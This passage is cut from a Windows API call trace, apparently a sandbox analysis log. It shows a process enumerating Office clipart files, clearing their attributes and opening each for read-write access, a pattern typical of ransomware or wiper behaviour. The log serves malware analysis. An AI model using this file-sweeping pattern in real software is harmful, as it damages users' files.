lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF", dwFileAttributes=0x80) returned 0 [0133.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.875] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF", dwFileAttributes=0x80) returned 0 [0133.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.875] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF", dwFileAttributes=0x80) returned 0 [0133.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.876] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.876] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF", dwFileAttributes=0x80) returned 0 [0133.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.876] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF", dwFileAttributes=0x80) returned 0 [0133.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.878] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.878] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF", dwFileAttributes=0x80) returned 0 [0133.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.878] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.878] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.878] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.878] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF", dwFileAttributes=0x80) returned 0 [0133.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.879] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF", dwFileAttributes=0x80) returned 0 [0133.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.879] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF", dwFileAttributes=0x80) returned 0 [0133.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.880] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF", dwFileAttributes=0x80) returned 0 [0133.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF", dwFileAttributes=0x80) returned 0 [0133.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.881] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.882] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF", dwFileAttributes=0x80) returned 0 [0133.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.882] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.882] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.883] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF", dwFileAttributes=0x80) returned 0 [0133.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.883] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF", dwFileAttributes=0x80) returned 0 [0133.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.884] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF", dwFileAttributes=0x80) returned 0 [0133.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.884] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF", dwFileAttributes=0x80) returned 0 [0133.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.885] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF", dwFileAttributes=0x80) returned 0 [0133.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.885] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF", dwFileAttributes=0x80) returned 0 [0133.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.886] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF", dwFileAttributes=0x80) returned 0 [0133.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.887] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF", dwFileAttributes=0x80) returned 0 [0133.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.887] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF", dwFileAttributes=0x80) returned 0 [0133.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.888] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF", dwFileAttributes=0x80) returned 0 [0133.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.889] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF", dwFileAttributes=0x80) returned 0 [0133.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.890] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.890] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.890] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF", dwFileAttributes=0x80) returned 0 [0133.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.891] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF", dwFileAttributes=0x80) returned 0 [0133.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.891] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.892] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF", dwFileAttributes=0x80) returned 0 [0133.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.893] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.893] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.893] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF", dwFileAttributes=0x80) returned 0 [0133.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.894] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.894] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.894] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.894] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF", dwFileAttributes=0x80) returned 0 [0133.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.895] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.895] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.895] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF", dwFileAttributes=0x80) returned 0 [0133.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.896] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.896] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF", dwFileAttributes=0x80) returned 0 [0133.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 